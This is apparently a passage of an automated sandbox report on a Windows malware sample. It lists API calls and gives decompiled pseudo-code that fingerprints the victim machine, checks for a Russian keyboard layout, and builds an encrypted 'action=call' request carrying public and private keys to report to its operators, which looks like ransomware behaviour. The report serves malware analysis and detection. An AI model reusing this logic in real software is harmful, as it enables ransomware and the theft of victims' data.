                                        0x0fc67410
                                        0x0fc67413
                                        0x0fc6742b
                                        0x0fc67432
                                        0x0fc6743a
                                        0x0fc6747e
                                        0x0fc67488
                                        0x0fc6748f
                                        0x00000000
                                        0x0fc6748f
                                        0x0fc6743f
                                        0x0fc67456
                                        0x0fc6745e
                                        0x0fc67469
                                        0x0fc67460
                                        0x0fc67460
                                        0x0fc67460
                                        0x0fc67472
                                        0x0fc6747c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc673a2
                                        0x0fc673b0
                                        0x0fc673b2
                                        0x0fc673b7
                                        0x00000000
                                        0x00000000
                                        0x0fc673b9
                                        0x0fc673cf
                                        0x0fc673d6
                                        0x0fc673f1
                                        0x0fc673f1
                                        0x0fc673f3
                                        0x00000000
                                        0x0fc673f3
                                        0x0fc673d8
                                        0x0fc673df
                                        0x00000000
                                        0x00000000
                                        0x0fc673f1
                                        0x00000000
                                        0x0fc673f1

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FC67357
                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 0FC67368
                                        • VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FC67386
                                        • GetComputerNameW.KERNEL32 ref: 0FC67390
                                        • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC673B0
                                        • wsprintfW.USER32 ref: 0FC673F1
                                        • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC6740E
                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FC67432
                                        • RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FC64640,?), ref: 0FC67456
                                        • GetLastError.KERNEL32 ref: 0FC67469
                                        • RegCloseKey.KERNEL32(00000000), ref: 0FC67472
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC6748F
                                        • VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0FC674AD
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FC674C3
                                        • wsprintfW.USER32 ref: 0FC674DD
                                        • RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0FC674FF
                                        • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,0FC64640,?), ref: 0FC67521
                                        • GetLastError.KERNEL32 ref: 0FC67534
                                        • RegCloseKey.KERNEL32(?), ref: 0FC6753D
                                        • lstrcmpiW.KERNEL32(0FC64640,00000419), ref: 0FC67551
                                        • wsprintfW.USER32 ref: 0FC6757E
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC6758D
                                        • VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0FC675AD
                                        • wsprintfW.USER32 ref: 0FC675F6
                                        • GetNativeSystemInfo.KERNEL32(?), ref: 0FC67605
                                        • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0FC67616
                                        • wsprintfW.USER32 ref: 0FC6763A
                                        • ExitProcess.KERNEL32 ref: 0FC67641
                                        • wsprintfW.USER32 ref: 0FC67669
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FC676A7
                                        • VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 0FC676BA
                                        • GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0FC676C4
                                        • GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0FC676FE
                                        • lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FC67730
                                        • wsprintfW.USER32 ref: 0FC67768
                                        • lstrcatW.KERNEL32(?,0000060C), ref: 0FC6777D
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0FC67789
                                        • GetProcAddress.KERNEL32(00000000), ref: 0FC67790
                                        • lstrlenW.KERNEL32(?), ref: 0FC677A0
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC677D1
                                          • Part of subcall function 0FC67A10: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0FC67A2D
                                          • Part of subcall function 0FC67A10: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FC67AA1
                                          • Part of subcall function 0FC67A10: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FC67AB6
                                          • Part of subcall function 0FC67A10: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC67ACC
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FC67828
                                        • GetDriveTypeW.KERNEL32(?), ref: 0FC6786F
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC67896
                                        • lstrcatW.KERNEL32(?,0FC7029C), ref: 0FC678A8
                                        • lstrcatW.KERNEL32(?,0FC70310), ref: 0FC678B2
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,0FC64640,?,00000000), ref: 0FC678C8
                                        • lstrlenW.KERNEL32(?,?,00000000,0FC64640,00000000,00000000,00000000,0FC64640,00000000), ref: 0FC67910
                                        • wsprintfW.USER32 ref: 0FC6792A
                                        • lstrlenW.KERNEL32(?), ref: 0FC67938
                                        • wsprintfW.USER32 ref: 0FC6794C
                                        • lstrcatW.KERNEL32(?,0FC70330), ref: 0FC6795F
                                        • lstrcatW.KERNEL32(?,0FC70334), ref: 0FC6796B
                                        • lstrlenW.KERNEL32(?), ref: 0FC67986
                                        • VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0FC679A9
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0FC679D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
                                        • String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
                                        • API String ID: 153366582-983031137
                                        • Opcode ID: d39547f3d5a597cdeb424ba77768e8e680b2aa8858c0f12f6d167dd7676fc163
                                        • Instruction ID: 14d03fbbd700e46dad958df07f2b596e6090ac8cd4f42c20a9822ae81aa91d8e
                                        • Opcode Fuzzy Hash: d39547f3d5a597cdeb424ba77768e8e680b2aa8858c0f12f6d167dd7676fc163
                                        • Instruction Fuzzy Hash: 7812AF70A84306EBEB218FA5CC87FAABBB4FF04715F100529F742B6191DBB5A514CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC65880 Relevance: 87.9, APIs: 45, Strings: 5, Instructions: 416stringmemoryencryptionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 120 fc65880-fc6590c call fc639f0 call fc67330 call fc67140 VirtualAlloc 127 fc65921-fc65925 120->127 128 fc6590e-fc65910 120->128 130 fc65927-fc65936 127->130 128->127 129 fc65912-fc6591f 128->129 129->130 131 fc6594f-fc65951 130->131 132 fc65938-fc6593d 130->132 134 fc65955-fc6595e 131->134 132->131 133 fc6593f-fc6594d 132->133 133->134 135 fc65960-fc6596b 134->135 136 fc6596d-fc6596f 134->136 135->136 137 fc65973-fc65975 135->137 136->137 138 fc65d44 137->138 139 fc6597b-fc659f8 CryptBinaryToStringA * 2 lstrlenA * 2 VirtualAlloc lstrlenA 137->139 142 fc65d4a 138->142 140 fc65a0f 139->140 141 fc659fa-fc659fc 139->141 144 fc65a17-fc65a20 lstrlenA 140->144 141->140 143 fc659fe-fc65a0d 141->143 145 fc65d4f-fc65d6d VirtualFree call fc67c10 142->145 143->144 146 fc65a22-fc65a28 144->146 147 fc65a2a 144->147 146->147 149 fc65a32-fc65a3c lstrlenA 146->149 147->149 151 fc65a72-fc65a79 lstrlenA 149->151 152 fc65a3e-fc65a4a 149->152 153 fc65aa1-fc65b68 lstrcatW lstrlenW call fc66f40 lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW VirtualAlloc lstrlenW 151->153 154 fc65a7b-fc65a7f 151->154 155 fc65a50-fc65a55 152->155 166 fc65b74-fc65b76 153->166 167 fc65b6a-fc65b6c 153->167 156 fc65a83-fc65a88 154->156 158 fc65a57-fc65a59 155->158 159 fc65a62-fc65a6c lstrlenA 155->159 161 fc65a95-fc65a9f lstrlenA 156->161 162 fc65a8a-fc65a8c 156->162 158->159 164 fc65a5b-fc65a5e 158->164 159->155 160 fc65a6e 159->160 160->151 161->153 161->156 162->161 165 fc65a8e-fc65a91 162->165 164->159 165->161 169 fc65b7a-fc65c2e lstrlenW call fc69010 lstrlenA call fc65d70 call fc65e20 CryptBinaryToStringA 166->169 167->166 168 fc65b6e-fc65b72 167->168 168->169 176 fc65c36-fc65c5c lstrlenA VirtualAlloc lstrlenA 169->176 177 fc65c30 GetLastError 169->177 178 fc65c66 176->178 179 fc65c5e-fc65c64 176->179 177->176 180 fc65c6e-fc65c75 lstrlenA 178->180 179->178 179->180 181 fc65c77-fc65c7f 180->181 182 fc65c9e-fc65cca lstrlenA MultiByteToWideChar call fc654a0 180->182 183 fc65c80-fc65c85 181->183 185 fc65ccf-fc65cd4 182->185 186 fc65c87-fc65c89 183->186 187 fc65c92-fc65c9c lstrlenA 183->187 188 fc65cd6-fc65d05 VirtualFree * 3 185->188 189 fc65d07-fc65d0d 185->189 186->187 190 fc65c8b-fc65c8e 186->190 187->182 187->183 188->145 191 fc65d14-fc65d42 VirtualFree * 3 189->191 192 fc65d0f-fc65d12 189->192 190->187 191->142 192->191
                                        C-Code - Quality: 79%
                                        			E0FC65880(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v295;
				char _v296;
				char _v404;
				char _v408;
				void* _v428;
				CHAR* _v432;
				int _v436;
				int _v440;
				char _v442;
				CHAR* _v444;
				short _v448;
				int _v452;
				char _v456;
				CHAR* _v464;
				int _v468;
				void* _v472;
				BYTE* _v476;
				WCHAR* _v480;
				WCHAR* _v484;
				void* _v488;
				void* _v492;
				short* _v496;
				CHAR* _v500;
				void* _v504;
				long _v508;
				CHAR* _v512;
				CHAR* _v528;
				CHAR* _t133;
				void* _t135;
				int _t145;
				void* _t148;
				int _t149;
				void* _t150;
				void* _t152;
				signed int _t159;
				signed int _t163;
				void* _t168;
				void* _t170;
				signed int _t172;
				void* _t183;
				CHAR* _t185;
				long _t189;
				intOrPtr _t199;
				int _t200;
				void _t202;
				int _t203;
				void _t204;
				int _t205;
				long _t213;
				void* _t219;
				short _t228;
				char* _t229;
				WCHAR* _t231;
				short _t233;
				CHAR* _t234;
				char _t235;
				void* _t238;
				long _t240;
				long _t241;
				void* _t243;
				void* _t245;
				short _t248;
				int _t249;
				void* _t255;
				CHAR* _t256;
				WCHAR* _t258;
				WCHAR* _t259;
				signed int _t261;
				CHAR* _t262;
				CHAR* _t263;
				signed int _t266;
				int _t267;
				void* _t268;
				long _t271;
				void* _t272;
				void* _t273;
				long _t279;
				int _t280;
				long _t281;
				void* _t282;
				CHAR* _t283;
				short _t284;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v456 = __ecx;
				_v436 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(1);
				_push(__ecx);
				_push(1);
				E0FC639F0( &_v404);
				E0FC67330( &_v492, __edx); // executed
				_t255 = E0FC67140( &_v492);
				_t266 = _a8 + __edx;
				_t7 = _t266 + 8; // 0x8
				_t213 = _t255 + _t7 * 8 << 3;
				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40); // executed
				_t248 = 0;
				_v512 = _t133;
				_v528 = _t133;
				_t228 = 0x30 + (_t255 + _t266 * 4) * 8;
				if(_t133 == 0 || _t228 >= _t213) {
					_v448 = _t248;
					_t256 = _t133;
				} else {
					_t256 =  &(_t133[_t228]);
					_v448 = _t133;
					_v444 = _t256;
					_t248 = _t228;
				}
				_t135 = 2 + _a8 * 8;
				if(_v428 == 0) {
					L7:
					_t229 = 0;
					_v432 = 0;
				} else {
					_t284 = _t248 + _t135;
					if(_t284 >= _t213) {
						goto L7;
					} else {
						_t229 = _t256;
						_v432 = _t256;
						_t256 =  &(_t256[_t135]);
						_t248 = _t284;
						_v444 = _t256;
					}
				}
				_t267 = _v440;
				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
					_t256 = 0;
					_v444 = 0;
				}
				if(_t229 == 0) {
					goto L53;
				} else {
					_t249 = _a8;
					_v436 = _t249 + _t249;
					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
					_v452 = _t267 + _t267;
					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
					_t145 = lstrlenA(_t256);
					_t271 = _t145 + lstrlenA(_v464) + 0x42;
					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40); // executed
					_v472 = _t148;
					_v488 = _t148;
					_v492 = 0;
					_t149 = lstrlenA(_v464);
					_t231 = _v472;
					_t150 = _t149 + 1;
					if(_t231 == 0 || _t150 >= _t271) {
						_v484 = 0;
					} else {
						_v492 = _t150;
						_v488 = _t231 + _t150;
						_v484 = _t231;
					}
					_t152 = lstrlenA(_t256) + 1;
					if(_v472 == 0 || _t152 + _v492 >= _t271) {
						_v488 = 0;
					}
					_t272 = 0;
					if(lstrlenA(_v464) != 0) {
						_t245 = _v484;
						_t263 = _v464;
						_v492 = _t245;
						do {
							_t204 =  *((intOrPtr*)(_t272 + _t263));
							if(_t204 != 0xa && _t204 != 0xd) {
								 *_t245 = _t204;
								_v492 = _t245 + 1;
							}
							_t272 = _t272 + 1;
							_t205 = lstrlenA(_t263);
							_t245 = _v492;
						} while (_t272 < _t205);
						_t256 = _v476;
					}
					_t273 = 0;
					if(lstrlenA(_t256) != 0) {
						_t243 = _v488;
						_v492 = _t243;
						do {
							_t202 =  *((intOrPtr*)(_t273 + _t256));
							if(_t202 != 0xa && _t202 != 0xd) {
								 *_t243 = _t202;
								_v492 = _t243 + 1;
							}
							_t273 = _t273 + 1;
							_t203 = lstrlenA(_t256);
							_t243 = _v492;
						} while (_t273 < _t203);
					}
					_t258 = _v480;
					lstrcatW(_t258, L"action=call&");
					_t259 =  &(_t258[lstrlenW(_t258)]);
					E0FC66F40( &_v440, _t259); // executed
					lstrcatW(_t259, L"&pub_key=");
					_t159 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
					lstrcatW(_t259, L"&priv_key=");
					_t163 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
					lstrcatW(_t259, L"&version=2.3r");
					_t279 = (lstrlenW(_v484) << 4) + 0x12;
					_t168 = VirtualAlloc(0, _t279, 0x3000, 0x40); // executed
					_t219 = _t168;
					_v480 = _t219;
					_t170 = 2 + lstrlenW(_v484) * 8;
					if(_t219 == 0 || _t170 >= _t279) {
						_v492 = 0;
					} else {
						_v492 = _t219;
					}
					_t172 = lstrlenW(_v480);
					_t233 = "#shasj"; // 0x61687323
					_t261 = _t172;
					asm("movq xmm0, [0xfc6fc78]");
					_v448 = _t233;
					_t234 =  *0xfc6fc84; // 0x6a73
					_v444 = _t234;
					_t235 =  *0xfc6fc86; // 0x0
					asm("movq [esp+0x3c], xmm0");
					_v442 = _t235;
					_v296 = 0;
					E0FC69010( &_v295, 0, 0xff);
					E0FC65D70( &_v296,  &_v456, lstrlenA( &_v456));
					_t280 = _t261 + _t261;
					E0FC65E20( &_v296, _v480, _t280);
					_t262 = _v492;
					_v468 = _t261 * 8;
					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
						GetLastError();
					}
					_t105 = lstrlenA(_t262) + 2; // 0x2
					_t281 = _t105;
					_t183 = VirtualAlloc(0, _t281, 0x3000, 0x40); // executed
					_v504 = _t183;
					_t107 = lstrlenA(_t262) + 1; // 0x1
					_t238 = _t107;
					_t185 = _v504;
					if(_t185 == 0) {
						L40:
						_v500 = 0;
					} else {
						_v500 = _t185;
						if(_t238 >= _t281) {
							goto L40;
						}
					}
					_t282 = 0;
					if(lstrlenA(_t262) != 0) {
						_t241 = _v500;
						_v508 = _t241;
						do {
							_t199 =  *((intOrPtr*)(_t282 + _t262));
							if(_t199 != 0xa && _t199 != 0xd) {
								 *_t241 = _t199;
								_v508 = _t241 + 1;
							}
							_t282 = _t282 + 1;
							_t200 = lstrlenA(_t262);
							_t241 = _v508;
						} while (_t282 < _t200);
					}
					_t283 = _v500;
					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
					_v508 = 0;
					_t189 = E0FC654A0(_t283,  &_v508, 1); // executed
					if(_t189 != 0) {
						_t240 = _v508;
						if(_t240 != 0) {
							 *_a12 = _t240;
						}
						VirtualFree(_v504, 0, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						L53:
						_t268 = 1;
					} else {
						VirtualFree(_v504, _t189, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						_t268 = 0;
					}
				}
				VirtualFree(_v428, 0, 0x8000);
				E0FC67C10( &_v408);
				return _t268;
			}





















































































                                        0x0fc6588f
                                        0x0fc65890
                                        0x0fc65892
                                        0x0fc65893
                                        0x0fc65898
                                        0x0fc6589e
                                        0x0fc658a2
                                        0x0fc658a4
                                        0x0fc658a5
                                        0x0fc658a7
                                        0x0fc658a8
                                        0x0fc658aa
                                        0x0fc658ab
                                        0x0fc658ad
                                        0x0fc658ae
                                        0x0fc658b3
                                        0x0fc658b5
                                        0x0fc658b6
                                        0x0fc658bf
                                        0x0fc658c8
                                        0x0fc658d9
                                        0x0fc658db
                                        0x0fc658e4
                                        0x0fc658ea
                                        0x0fc658f0
                                        0x0fc658f6
                                        0x0fc658f8
                                        0x0fc658fc
                                        0x0fc65903
                                        0x0fc6590c
                                        0x0fc65921
                                        0x0fc65925
                                        0x0fc65912
                                        0x0fc65912
                                        0x0fc65915
                                        0x0fc65919
                                        0x0fc6591d
                                        0x0fc6591d
                                        0x0fc6592f
                                        0x0fc65936
                                        0x0fc6594f
                                        0x0fc6594f
                                        0x0fc65951
                                        0x0fc65938
                                        0x0fc65938
                                        0x0fc6593d
                                        0x00000000
                                        0x0fc6593f
                                        0x0fc6593f
                                        0x0fc65941
                                        0x0fc65945
                                        0x0fc65947
                                        0x0fc65949
                                        0x0fc65949
                                        0x0fc6593d
                                        0x0fc6595a
                                        0x0fc6595e
                                        0x0fc6596d
                                        0x0fc6596f
                                        0x0fc6596f
                                        0x0fc65975
                                        0x00000000
                                        0x0fc6597b
                                        0x0fc6597b
                                        0x0fc65987
                                        0x0fc6599a
                                        0x0fc6599f
                                        0x0fc659b3
                                        0x0fc659bc
                                        0x0fc659d0
                                        0x0fc659d5
                                        0x0fc659df
                                        0x0fc659e3
                                        0x0fc659e7
                                        0x0fc659ef
                                        0x0fc659f1
                                        0x0fc659f5
                                        0x0fc659f8
                                        0x0fc65a0f
                                        0x0fc659fe
                                        0x0fc65a01
                                        0x0fc65a05
                                        0x0fc65a09
                                        0x0fc65a09
                                        0x0fc65a1a
                                        0x0fc65a20
                                        0x0fc65a2a
                                        0x0fc65a2a
                                        0x0fc65a36
                                        0x0fc65a3c
                                        0x0fc65a3e
                                        0x0fc65a42
                                        0x0fc65a46
                                        0x0fc65a50
                                        0x0fc65a50
                                        0x0fc65a55
                                        0x0fc65a5b
                                        0x0fc65a5e
                                        0x0fc65a5e
                                        0x0fc65a63
                                        0x0fc65a64
                                        0x0fc65a66
                                        0x0fc65a6a
                                        0x0fc65a6e
                                        0x0fc65a6e
                                        0x0fc65a73
                                        0x0fc65a79
                                        0x0fc65a7b
                                        0x0fc65a7f
                                        0x0fc65a83
                                        0x0fc65a83
                                        0x0fc65a88
                                        0x0fc65a8e
                                        0x0fc65a91
                                        0x0fc65a91
                                        0x0fc65a96
                                        0x0fc65a97
                                        0x0fc65a99
                                        0x0fc65a9d
                                        0x0fc65a83
                                        0x0fc65aa1
                                        0x0fc65ab1
                                        0x0fc65ac0
                                        0x0fc65ac4
                                        0x0fc65acf
                                        0x0fc65ad2
                                        0x0fc65af0
                                        0x0fc65afc
                                        0x0fc65aff
                                        0x0fc65b21
                                        0x0fc65b2d
                                        0x0fc65b47
                                        0x0fc65b4d
                                        0x0fc65b57
                                        0x0fc65b59
                                        0x0fc65b5f
                                        0x0fc65b68
                                        0x0fc65b76
                                        0x0fc65b6e
                                        0x0fc65b6e
                                        0x0fc65b6e
                                        0x0fc65b7e
                                        0x0fc65b80
                                        0x0fc65b86
                                        0x0fc65b88
                                        0x0fc65b97
                                        0x0fc65b9b
                                        0x0fc65ba7
                                        0x0fc65bac
                                        0x0fc65bb5
                                        0x0fc65bbb
                                        0x0fc65bbf
                                        0x0fc65bc7
                                        0x0fc65be8
                                        0x0fc65bf1
                                        0x0fc65bff
                                        0x0fc65c0e
                                        0x0fc65c12
                                        0x0fc65c2e
                                        0x0fc65c30
                                        0x0fc65c30
                                        0x0fc65c40
                                        0x0fc65c40
                                        0x0fc65c46
                                        0x0fc65c4d
                                        0x0fc65c53
                                        0x0fc65c53
                                        0x0fc65c56
                                        0x0fc65c5c
                                        0x0fc65c66
                                        0x0fc65c66
                                        0x0fc65c5e
                                        0x0fc65c5e
                                        0x0fc65c64
                                        0x00000000
                                        0x00000000
                                        0x0fc65c64
                                        0x0fc65c6f
                                        0x0fc65c75
                                        0x0fc65c77
                                        0x0fc65c7b
                                        0x0fc65c80
                                        0x0fc65c80
                                        0x0fc65c85
                                        0x0fc65c8b
                                        0x0fc65c8e
                                        0x0fc65c8e
                                        0x0fc65c93
                                        0x0fc65c94
                                        0x0fc65c96
                                        0x0fc65c9a
                                        0x0fc65c80
                                        0x0fc65c9e
                                        0x0fc65cb4
                                        0x0fc65cc0
                                        0x0fc65cca
                                        0x0fc65cd4
                                        0x0fc65d07
                                        0x0fc65d0d
                                        0x0fc65d12
                                        0x0fc65d12
                                        0x0fc65d26
                                        0x0fc65d33
                                        0x0fc65d40
                                        0x0fc65d4a
                                        0x0fc65d4a
                                        0x0fc65cd6
                                        0x0fc65ce7
                                        0x0fc65cf4
                                        0x0fc65d01
                                        0x0fc65d03
                                        0x0fc65d03
                                        0x0fc65cd4
                                        0x0fc65d5a
                                        0x0fc65d60
                                        0x0fc65d6d

                                        APIs
                                          • Part of subcall function 0FC639F0: GetProcessHeap.KERNEL32(?,?,0FC64637,00000000,?,00000000,00000000), ref: 0FC63A8C
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FC67357
                                          • Part of subcall function 0FC67330: GetUserNameW.ADVAPI32(00000000,?), ref: 0FC67368
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FC67386
                                          • Part of subcall function 0FC67330: GetComputerNameW.KERNEL32 ref: 0FC67390
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC673B0
                                          • Part of subcall function 0FC67330: wsprintfW.USER32 ref: 0FC673F1
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC6740E
                                          • Part of subcall function 0FC67330: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FC67432
                                          • Part of subcall function 0FC67330: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FC64640,?), ref: 0FC67456
                                          • Part of subcall function 0FC67330: RegCloseKey.KERNEL32(00000000), ref: 0FC67472
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67192
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6719D
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671B3
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671BE
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671D4
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671DF
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671F5
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(0FC64966,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67200
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67216
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67221
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67237
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67242
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67261
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6726C
                                        • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0FC658F0
                                        • CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0FC6599A
                                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0FC659B3
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC659BC
                                        • lstrlenA.KERNEL32(?), ref: 0FC659C4
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0FC659D5
                                        • lstrlenA.KERNEL32(?), ref: 0FC659EF
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65A18
                                        • lstrlenA.KERNEL32(?), ref: 0FC65A38
                                        • lstrlenA.KERNEL32(?), ref: 0FC65A64
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65A75
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65A97
                                        • lstrcatW.KERNEL32(?,action=call&), ref: 0FC65AB1
                                        • lstrlenW.KERNEL32(?), ref: 0FC65ABA
                                        • lstrcatW.KERNEL32(?,&pub_key=), ref: 0FC65ACF
                                        • lstrlenW.KERNEL32(?), ref: 0FC65AD2
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65ADB
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,74CB69A0,00000000), ref: 0FC65AF0
                                        • lstrcatW.KERNEL32(?,&priv_key=), ref: 0FC65AFC
                                        • lstrlenW.KERNEL32(?), ref: 0FC65AFF
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65B0C
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,74CB69A0,00000000), ref: 0FC65B21
                                        • lstrcatW.KERNEL32(?,&version=2.3r), ref: 0FC65B2D
                                        • lstrlenW.KERNEL32(?), ref: 0FC65B39
                                        • VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 0FC65B4D
                                        • lstrlenW.KERNEL32(?), ref: 0FC65B5D
                                        • lstrlenW.KERNEL32(?), ref: 0FC65B7E
                                        • _memset.LIBCMT ref: 0FC65BC7
                                        • lstrlenA.KERNEL32(?), ref: 0FC65BDA
